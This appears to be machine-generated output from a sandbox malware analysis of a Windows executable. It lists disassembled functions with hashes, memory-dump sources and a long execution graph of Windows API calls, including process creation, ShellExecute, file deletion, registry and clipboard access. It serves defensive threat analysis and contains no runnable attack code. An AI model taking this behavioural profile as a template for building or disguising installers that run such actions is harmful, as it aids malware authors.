                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                              • String ID: f
                                                                                                                                                                                                                                                              • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                              • Opcode ID: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                                              • Instruction ID: 922df396bf3e7088f2107368fcd68d656d94b82640ce54d584134d1287f84c7b
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6519dfc4b30f4dc8ba30da0d317b8fe5b2658bb7498cf5162ba835f3d9dec96
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E2117B0804308EFDB10AFA9D88829EBFF4EF84314F00C91EE99557281D7B98459CF96
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1849352358-0
                                                                                                                                                                                                                                                              • Opcode ID: 0eb1dde49e5088c645436d80e0d320c5bcc3f7de41383c0d5e17875132fa004a
                                                                                                                                                                                                                                                              • Instruction ID: 8f4e6c7c9ceedfa20c72349621b66b9a182318fedd968a48d18be14dbb0e03f5
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eb1dde49e5088c645436d80e0d320c5bcc3f7de41383c0d5e17875132fa004a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC1116B19083009FD750EF69D94839EFBF4FB88315F41886EE58897260D7789985CF46
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                              • String ID: !
                                                                                                                                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                              • Opcode ID: ae62e435266e3004bc25908d5d2ad0cb5826a6fc8d1708ba3a371f46b01cab50
                                                                                                                                                                                                                                                              • Instruction ID: a790f44bbcbfc51444ab4f93a78f6104840dc0be6af6187218351783eeece817
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae62e435266e3004bc25908d5d2ad0cb5826a6fc8d1708ba3a371f46b01cab50
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 044140B18083109FD715AF6AC84839EFBF4AF84344F41C4AEE488A32A1D7788981CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID: #v$Installed
                                                                                                                                                                                                                                                              • API String ID: 3394109436-3218973552
                                                                                                                                                                                                                                                              • Opcode ID: 9eaf42be06e0d8165a7845864ac7e32df8efedfd5a489f51e2e5e30a7a8364af
                                                                                                                                                                                                                                                              • Instruction ID: caab7a00c9507933a32b1cf3e7c2368a526c10743f68ba1ac9ea26b5e2cc4220
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9eaf42be06e0d8165a7845864ac7e32df8efedfd5a489f51e2e5e30a7a8364af
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23315EB2908710AFD720EF15D944A6BB7E8EB84705F01853EF985B7380D7789D41CB9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: MessageSend$TextWindow
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1596935084-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Close$DeleteOpen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2349717609-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407D9F
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,?,?,00000000,?,?,?,004042CE), ref: 00407DBE
                                                                                                                                                                                                                                                              • CharNextA.USER32(?,?,?,00000000,?,?,?,004042CE), ref: 00407DCA
                                                                                                                                                                                                                                                              • CharPrevA.USER32(?,?,00000000,?,?,?,004042CE), ref: 00407DE5
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 589700163-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: TextWindow
                                                                                                                                                                                                                                                              • String ID: =\q$Lq
                                                                                                                                                                                                                                                              • API String ID: 530164218-3019991871
                                                                                                                                                                                                                                                              • Opcode ID: bc2eee6d10165418753e2462cb524adf5d7b8903337a38afe12c1506d900572b
                                                                                                                                                                                                                                                              • Instruction ID: 1ede243bc7e0a0f37790e6dcd7246a005d3f2f3aa806950eac8677958e19fd18
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc2eee6d10165418753e2462cb524adf5d7b8903337a38afe12c1506d900572b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E2187B0A046049FC714DF6AD885A6BB7F5EF88314F44853EE554D73A0E738AC41CB95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • IsWindowVisible.USER32 ref: 00406F16
                                                                                                                                                                                                                                                              • CallWindowProcA.USER32 ref: 00406FB8
                                                                                                                                                                                                                                                                • Part of subcall function 00404BD7: SendMessageA.USER32 ref: 00404C00
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                              • Opcode ID: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                                              • Instruction ID: 9710050d3cc87503a6e3ad62db4a5623da0bea7fc0aec59e94b28eb5e14ff036
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fef611bbe469a29a19d67650dfd37103651c2d078b1ca09239947b2c1c1f8b3b
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F212CB0908315AFE710AF15E88496FBBF8EF44718F51883EF895A7281C3795851CB6A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:6.9%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                                              Total number of Nodes:1296
                                                                                                                                                                                                                                                              Total number of Limit Nodes:15
7253->7255 7254->7255 7255->7248 7258 403854 7256->7258 7257 4038f0 7257->7248 7258->7257 7259 4038a0 MulDiv SendMessageA 7258->7259 7259->7258 7260->7067 7262 40795a 7261->7262 7263 4078a4 CharNextA 7262->7263 7266 407976 7262->7266 7264 40798a 7263->7264 7265 4078a4 CharNextA 7264->7265 7264->7266 7265->7266 7266->7070 7266->7071 7268 408155 7267->7268 7269 408146 FindClose 7267->7269 7268->7078 7269->7268 7271 4049f4 7270->7271 7272 40435d 7271->7272 7273 4049f9 FreeLibrary GlobalFree 7271->7273 7274 4085b8 7272->7274 7273->7271 7275 40815b 17 API calls 7274->7275 7276 4085cf 7275->7276 7277 4085d6 DeleteFileA 7276->7277 7278 4085f3 7276->7278 7305 404371 OleUninitialize 7277->7305 7280 4087b6 7278->7280 7278->7305 7313 407cb6 lstrcpynA 7278->7313 7282 408123 2 API calls 7280->7282 7280->7305 7281 408625 7283 408630 7281->7283 7284 408648 7281->7284 7287 4087d5 7282->7287 7314 407ce8 lstrcatA 7283->7314 7286 4078ce 2 API calls 7284->7286 7288 408644 7286->7288 7289 407cf2 3 API calls 7287->7289 7287->7305 7292 408671 lstrlenA FindFirstFileA 7288->7292 7315 407ce8 lstrcatA 7288->7315 7290 4087e2 7289->7290 7291 407a46 2 API calls 7290->7291 7294 4087eb RemoveDirectoryA 7291->7294 7292->7280 7311 4086a7 7292->7311 7296 4087fa 7294->7296 7297 40882c 7294->7297 7300 406fcb 23 API calls 7296->7300 7296->7305 7299 406fcb 23 API calls 7297->7299 7298 4078a4 CharNextA 7298->7311 7299->7305 7301 408810 7300->7301 7302 408311 39 API calls 7301->7302 7302->7305 7303 40878f FindNextFileA 7306 4087ac FindClose 7303->7306 7303->7311 7305->6889 7305->6893 7306->7280 7308 4085b8 56 API calls 7308->7311 7310 406fcb 23 API calls 7310->7311 7311->7298 7311->7303 7311->7308 7311->7310 7316 407cb6 lstrcpynA 7311->7316 7317 407a46 GetFileAttributesA 7311->7317 7320 408311 7311->7320 7313->7281 7316->7311 7318 407a71 DeleteFileA 7317->7318 7319 407a5f SetFileAttributesA 7317->7319 7318->7311 7319->7318 7321 408299 5 API calls 7320->7321 7322 40832c 7321->7322 7323 408345 7322->7323 
7327 4085a8 7322->7327 7346 407a78 GetFileAttributesA CreateFileA 7322->7346 7324 4083b5 GetShortPathNameA 7323->7324 7323->7327 7326 4083d5 7324->7326 7324->7327 7326->7327 7329 4083e0 wsprintfA 7326->7329 7327->7311 7328 40837d CloseHandle GetShortPathNameA 7328->7323 7328->7327 7330 407e06 18 API calls 7329->7330 7331 408423 7330->7331 7347 407a78 GetFileAttributesA CreateFileA 7331->7347 7333 408441 7333->7327 7334 40844f GetFileSize GlobalAlloc 7333->7334 7335 408488 ReadFile 7334->7335 7336 40859e CloseHandle 7334->7336 7335->7336 7337 4084b3 7335->7337 7336->7327 7337->7336 7348 4079b4 lstrlenA 7337->7348 7340 4084d2 7353 407cb6 lstrcpynA 7340->7353 7341 4084ee 7342 4079b4 3 API calls 7341->7342 7344 4084e8 7342->7344 7345 408547 SetFilePointer WriteFile GlobalFree 7344->7345 7345->7336 7346->7328 7347->7333 7349 4079d4 7348->7349 7350 407a05 7349->7350 7351 4079df lstrcmpiA 7349->7351 7350->7340 7350->7341 7351->7350 7352 407a09 CharNextA 7351->7352 7352->7349 7353->7344 8033 403376 8034 401456 18 API calls 8033->8034 8035 403394 8034->8035 8036 40339f SetFilePointer 8035->8036 8037 4033c9 8036->8037 8038 403700 8037->8038 8039 4036eb 8037->8039 8042 4036f7 8037->8042 8041 407e06 18 API calls 8038->8041 8040 401456 18 API calls 8039->8040 8040->8042 8041->8042 8043 401777 SetForegroundWindow 8044 40219b 8043->8044 8318 4033f9 FindNextFileA 8319 403429 8318->8319 8320 40347d 8319->8320 8324 407be3 wsprintfA 8319->8324 8325 407cb6 lstrcpynA 8320->8325 8323 4036c5 8324->8320 8325->8323 7624 40247c GetDC GetDeviceCaps 7625 401456 18 API calls 7624->7625 7626 4024ad MulDiv 7625->7626 7627 401456 18 API calls 7626->7627 7628 4024d9 7627->7628 7629 407e06 18 API calls 7628->7629 7630 402520 CreateFontIndirectA 7629->7630 7631 40252f 7630->7631 7634 407be3 wsprintfA 7631->7634 7633 40253c 7634->7633 8045 40297c 8046 402a36 8045->8046 8047 40163b 23 API calls 8046->8047 8048 402a3b 8047->8048 8326 4017fe 8327 402530 8326->8327 8330 407be3 wsprintfA 8327->8330 8329 
40253c 8330->8329 7635 401000 7636 401032 BeginPaint GetClientRect 7635->7636 7637 401017 DefWindowProcA 7635->7637 7639 401078 7636->7639 7642 401212 7637->7642 7640 401130 7639->7640 7641 401084 CreateBrushIndirect FillRect DeleteObject 7639->7641 7643 40113a CreateFontIndirectA 7640->7643 7644 4011db EndPaint 7640->7644 7641->7639 7643->7644 7645 401151 6 API calls 7643->7645 7644->7642 7645->7644 7860 403684 7861 401456 18 API calls 7860->7861 7862 403689 7861->7862 7863 4036ca 7862->7863 7864 4036b0 7862->7864 7870 402a3c 7862->7870 7865 403700 7863->7865 7866 4036eb 7863->7866 7871 407cb6 lstrcpynA 7864->7871 7868 407e06 18 API calls 7865->7868 7867 401456 18 API calls 7866->7867 7867->7870 7868->7870 7871->7870 7652 401809 7653 40181c 7652->7653 7654 40180d ShowWindow 7652->7654 7655 40256d ShowWindow 7653->7655 7656 4037d4 7653->7656 7654->7653 7655->7656 7879 403089 7888 4015b0 7879->7888 7881 403095 7882 401456 18 API calls 7881->7882 7883 4030a4 7882->7883 7884 4030e5 RegEnumValueA 7883->7884 7885 4030c7 RegEnumKeyA 7883->7885 7886 402a3c 7883->7886 7884->7886 7887 40312b RegCloseKey 7884->7887 7885->7887 7887->7886 7889 401400 18 API calls 7888->7889 7891 4015cc RegOpenKeyExA 7889->7891 7891->7881 8331 40258a 8332 401400 18 API calls 8331->8332 8333 40258f 8332->8333 8334 401400 18 API calls 8333->8334 8335 40259e 8334->8335 8336 401400 18 API calls 8335->8336 8337 4025ad 8336->8337 8338 401400 18 API calls 8337->8338 8339 4025bc 8338->8339 8340 40163b 23 API calls 8339->8340 8341 4025c9 ShellExecuteA 8340->8341 8056 40710b 8057 4073a5 8056->8057 8073 40712c 8056->8073 8058 407404 8057->8058 8059 4073ad GetDlgItem CreateThread CloseHandle 8057->8059 8061 40740c 8058->8061 8062 40744f 8058->8062 8060 4074ba 8059->8060 8064 407449 8060->8064 8068 4074cd SendMessageA 8060->8068 8063 407418 ShowWindow ShowWindow 8061->8063 8061->8064 8062->8060 8067 407473 ShowWindow 8062->8067 8077 407460 8062->8077 8104 404c96 SendMessageA 8063->8104 8065 404f0f 8 API 
calls 8064->8065 8069 407687 8065->8069 8070 407494 8067->8070 8067->8077 8068->8069 8072 4074fc CreatePopupMenu 8068->8072 8074 406fcb 23 API calls 8070->8074 8075 407e06 18 API calls 8072->8075 8102 404c96 SendMessageA 8073->8102 8074->8077 8078 407518 AppendMenuA 8075->8078 8105 404cc8 8077->8105 8080 407540 GetWindowRect 8078->8080 8081 40755a 8078->8081 8079 4071b9 8082 4071c6 GetClientRect GetSystemMetrics SendMessageA SendMessageA 8079->8082 8083 407564 TrackPopupMenu 8080->8083 8081->8083 8084 407247 SendMessageA SendMessageA 8082->8084 8085 40727f 8082->8085 8083->8069 8086 40759e 8083->8086 8084->8085 8087 407285 SendMessageA 8085->8087 8088 4072a8 8085->8088 8090 4075c4 SendMessageA 8086->8090 8091 4075ec OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 8086->8091 8087->8088 8089 404d65 18 API calls 8088->8089 8093 4072c5 8089->8093 8090->8086 8092 40762a SendMessageA 8091->8092 8092->8092 8094 407664 GlobalUnlock SetClipboardData CloseClipboard 8092->8094 8095 4072d1 ShowWindow 8093->8095 8096 40731c SendMessageA 8093->8096 8094->8069 8097 4072f4 ShowWindow 8095->8097 8098 407305 8095->8098 8096->8069 8100 407365 SendMessageA SendMessageA 8096->8100 8097->8098 8103 404c96 SendMessageA 8098->8103 8100->8069 8102->8079 8103->8096 8104->8064 8106 404cd6 8105->8106 8107 404cdc SendMessageA 8105->8107 8106->8107 8107->8060 7389 401b0d 7390 401400 18 API calls 7389->7390 7391 401b12 7390->7391 7392 401b2b 7391->7392 7393 401b3d 7391->7393 7443 407cb6 lstrcpynA 7392->7443 7444 407cb6 lstrcpynA 7393->7444 7396 401b3b 7400 407d37 5 API calls 7396->7400 7397 401b51 7398 407cf2 3 API calls 7397->7398 7399 401b5b 7398->7399 7445 407ce8 lstrcatA 7399->7445 7402 401b76 7400->7402 7403 401b7c 7402->7403 7424 401bba 7402->7424 7404 408123 2 API calls 7403->7404 7405 401b88 7404->7405 7407 401b91 CompareFileTime 7405->7407 7408 401ba9 7405->7408 7406 407a46 2 API calls 7406->7424 7407->7408 7408->7424 7410 401cce 7412 406fcb 23 API calls 7410->7412 7411 401c05 7414 
406fcb 23 API calls 7411->7414 7415 401cde 7412->7415 7413 407cb6 lstrcpynA 7413->7424 7422 401c15 7414->7422 7416 403d52 45 API calls 7415->7416 7417 401d08 7416->7417 7418 401d25 SetFileTime 7417->7418 7419 401d1c 7417->7419 7420 401d47 CloseHandle 7418->7420 7419->7418 7419->7420 7420->7422 7423 401d59 7420->7423 7421 407e06 18 API calls 7421->7424 7425 401d86 7423->7425 7426 401d5e 7423->7426 7424->7406 7424->7410 7424->7411 7424->7413 7424->7421 7430 407836 MessageBoxIndirectA 7424->7430 7433 401ca5 7424->7433 7442 407a78 GetFileAttributesA CreateFileA 7424->7442 7428 407e06 18 API calls 7425->7428 7427 407e06 18 API calls 7426->7427 7429 401d72 7427->7429 7431 401d84 7428->7431 7446 407ce8 lstrcatA 7429->7446 7430->7424 7434 407836 MessageBoxIndirectA 7431->7434 7433->7422 7435 406fcb 23 API calls 7433->7435 7437 401cc9 7434->7437 7435->7437 7447 407cb6 lstrcpynA 7437->7447 7438 402141 7448 407cb6 lstrcpynA 7438->7448 7440 402157 7449 407cb6 lstrcpynA 7440->7449 7442->7424 7443->7396 7444->7397 7447->7438 7448->7440 7449->7422 7657 40200f 7658 401456 18 API calls 7657->7658 7659 402016 7658->7659 7660 401456 18 API calls 7659->7660 7661 402025 7660->7661 7664 407be3 wsprintfA 7661->7664 7663 402332 7664->7663 8108 401f0f 8109 401400 18 API calls 8108->8109 8110 401f14 8109->8110 8111 401400 18 API calls 8110->8111 8112 401f23 8111->8112 8113 401f34 lstrcmpiA 8112->8113 8114 401f3c lstrcmpA 8112->8114 8115 401f42 8113->8115 8114->8115 8342 40298f 8343 401400 18 API calls 8342->8343 8344 402994 8343->8344 8345 401400 18 API calls 8344->8345 8346 4029a7 8345->8346 8347 401400 18 API calls 8346->8347 8348 4029b6 8347->8348 8349 401400 18 API calls 8348->8349 8350 4029c9 8349->8350 8351 401400 18 API calls 8350->8351 8353 4029d8 8351->8353 8352 4029f9 CoCreateInstance 8355 402a2f 8352->8355 8361 402a46 8352->8361 8353->8352 8354 401400 18 API calls 8353->8354 8356 4029f8 8354->8356 8357 40163b 23 API calls 8355->8357 8356->8352 8358 402a3b 8357->8358 8359 402bc5 
8360 40163b 23 API calls 8359->8360 8360->8358 8362 402b39 MultiByteToWideChar 8361->8362 8363 402b7c 8361->8363 8362->8363 8363->8355 8363->8359 7892 403491 7893 401400 18 API calls 7892->7893 7895 40349d 7893->7895 7894 4034b9 7897 407a46 2 API calls 7894->7897 7895->7894 7896 401400 18 API calls 7895->7896 7896->7894 7898 4034c2 7897->7898 7919 407a78 GetFileAttributesA CreateFileA 7898->7919 7900 4034db 7901 403500 GlobalAlloc 7900->7901 7902 4034e7 DeleteFileA 7900->7902 7904 403644 CloseHandle 7901->7904 7905 40352f 7901->7905 7903 403668 7902->7903 7908 40163b 23 API calls 7903->7908 7909 403677 7903->7909 7904->7902 7904->7903 7920 403b31 SetFilePointer 7905->7920 7907 40353b 7910 403ae9 ReadFile 7907->7910 7908->7909 7911 40354e GlobalAlloc 7910->7911 7912 40356b 7911->7912 7913 4035dd WriteFile GlobalFree 7911->7913 7914 403d52 45 API calls 7912->7914 7915 403d52 45 API calls 7913->7915 7918 40358f 7914->7918 7916 40363f 7915->7916 7916->7904 7917 4035d3 GlobalFree 7917->7913 7918->7917 7919->7900 7920->7907 7665 406614 GetDlgItem GetDlgItem 7666 406671 7 API calls 7665->7666 7671 4069d1 7665->7671 7667 406797 DeleteObject 7666->7667 7668 406777 SendMessageA 7666->7668 7669 4067b0 7667->7669 7668->7667 7672 407e06 18 API calls 7669->7672 7675 40681b 7669->7675 7670 406af3 7673 406b30 7670->7673 7674 406bf6 7670->7674 7671->7670 7701 406a56 7671->7701 7718 406557 SendMessageA 7671->7718 7678 4067d9 SendMessageA SendMessageA 7672->7678 7685 406b49 SendMessageA 7673->7685 7708 4069cb 7673->7708 7676 406c28 7674->7676 7677 406bff SendMessageA 7674->7677 7679 404d65 18 API calls 7675->7679 7682 406c31 7676->7682 7683 406c7a 7676->7683 7677->7708 7678->7669 7686 40683e 7679->7686 7680 404f0f 8 API calls 7689 406eca 7680->7689 7681 406ad0 SendMessageA 7681->7670 7690 406c44 7682->7690 7691 406c3a ImageList_Destroy 7682->7691 7697 403903 2 API calls 7683->7697 7711 406caf 7683->7711 7716 406e5e 7683->7716 7687 406b7b SendMessageA 7685->7687 7685->7708 7688 404d65 
18 API calls 7686->7688 7696 406ba1 7687->7696 7695 40685d 7688->7695 7692 406c4d GlobalFree 7690->7692 7690->7708 7691->7690 7692->7708 7693 406e73 ShowWindow GetDlgItem ShowWindow 7693->7708 7694 40696b 7699 406971 GetWindowLongA SetWindowLongA 7694->7699 7700 40699f 7694->7700 7695->7694 7702 4068b2 SendMessageA 7695->7702 7705 406902 SendMessageA 7695->7705 7706 406926 SendMessageA 7695->7706 7698 406bbf SendMessageA 7696->7698 7697->7711 7698->7683 7699->7700 7703 4069c3 7700->7703 7704 4069a5 ShowWindow 7700->7704 7701->7670 7701->7681 7701->7683 7702->7695 7717 404c96 SendMessageA 7703->7717 7704->7703 7705->7695 7706->7695 7708->7680 7709 406e0a InvalidateRect 7710 406e31 7709->7710 7709->7716 7715 404da2 21 API calls 7710->7715 7712 406d17 7711->7712 7713 406ced SendMessageA 7711->7713 7712->7709 7714 406da4 SendMessageA SendMessageA 7712->7714 7713->7712 7714->7712 7715->7716 7716->7693 7716->7708 7717->7708 7719 4065db 7718->7719 7720 406595 GetMessagePos ScreenToClient SendMessageA 7718->7720 7719->7701 7720->7719 8116 401714 8117 40171c 8116->8117 8118 403845 2 API calls 8117->8118 8119 40172e 8118->8119 7721 40261a 7722 401400 18 API calls 7721->7722 7723 40261f 7722->7723 7724 406fcb 23 API calls 7723->7724 7725 402632 7724->7725 7736 407779 CreateProcessA 7725->7736 7727 402656 WaitForSingleObject 7729 40267b GetExitCodeProcess 7727->7729 7730 40263c 7727->7730 7733 4026b1 CloseHandle 7729->7733 7734 402699 7729->7734 7730->7727 7731 402a3c 7730->7731 7732 408848 2 API calls 7730->7732 7730->7733 7732->7730 7733->7731 7739 407be3 wsprintfA 7734->7739 7737 4077f5 7736->7737 7738 4077e5 CloseHandle 7736->7738 7737->7730 7738->7737 7739->7733 8371 4023a0 8372 401456 18 API calls 8371->8372 8373 4023ae SetWindowLongA 8372->8373 8374 40382c 8373->8374 8375 402fa4 8376 4015b0 19 API calls 8375->8376 8377 402fa9 8376->8377 8378 401400 18 API calls 8377->8378 8379 402fbc 8378->8379 8380 402fd1 RegQueryValueExA 8379->8380 8383 402a3c 8379->8383 8381 403015 
